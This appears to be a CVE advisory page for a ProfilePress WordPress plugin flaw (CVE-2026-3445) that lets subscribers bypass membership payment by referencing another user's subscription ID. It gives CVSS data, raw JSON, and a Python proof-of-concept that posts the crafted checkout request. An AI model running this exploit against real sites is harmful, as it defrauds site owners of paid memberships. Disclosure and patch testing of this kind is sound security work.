Security Vulnerability Report
CVE-2026-3445 CVSS 7.1 HIGH

Published: 2026-04-04 09:16:20
Last Modified: 2026-04-24 18:13:29

Description

The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to unauthorized membership payment bypass in all versions up to, and including, 4.16.11. This is due to a missing ownership verification on the `change_plan_sub_id` parameter in the `process_checkout()` function. This makes it possible for authenticated attackers, with subscriber level access and above, to reference another user's active subscription during checkout to manipulate proration calculations, allowing them to obtain paid lifetime membership plans without payment via the `ppress_process_checkout` AJAX action.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

ProfilePress WordPress Plugin <= 4.16.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit Title: ProfilePress <= 4.16.11 - Membership Payment Bypass
# Description: Authenticated users can bypass payment by referencing another user's subscription ID.

target_url = "https://example.com/wp-admin/admin-ajax.php"

# Attacker's cookie (Must be a logged-in user, e.g., subscriber)
attacker_cookie = {
    "wordpress_logged_in_12345": "attacker_session_token_here"
}

# Vulnerable payload
# 'change_plan_sub_id' should be a valid subscription ID belonging to another user (e.g., admin)
payload = {
    "action": "ppress_process_checkout",
    "plan_id": "3",
    "change_plan_sub_id": "55",
    "gateway": "manual"
}

response = requests.post(target_url, data=payload, cookies=attacker_cookie)

if response.status_code == 200:
    print("[+] Request sent successfully. Check if membership was upgraded.")
    print("[+] Response:", response.text)
else:
    print("[-] Failed to send request.")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3445", "sourceIdentifier": "[email protected]", "published": "2026-04-04T09:16:20.330", "lastModified": "2026-04-24T18:13:28.877", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to unauthorized membership payment bypass in all versions up to, and including, 4.16.11. This is due to a missing ownership verification on the `change_plan_sub_id` parameter in the `process_checkout()` function. This makes it possible for authenticated attackers, with subscriber level access and above, to reference another user's active subscription during checkout to manipulate proration calculations, allowing them to obtain paid lifetime membership plans without payment via the `ppress_process_checkout` AJAX action."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3474509%40wp-user-avatar%2Ftrunk&old=3473639%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=#file3", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae1e198b-0c0d-47aa-8a56-ec4e790c8022?source=cve", "source": "[email protected]"}]}}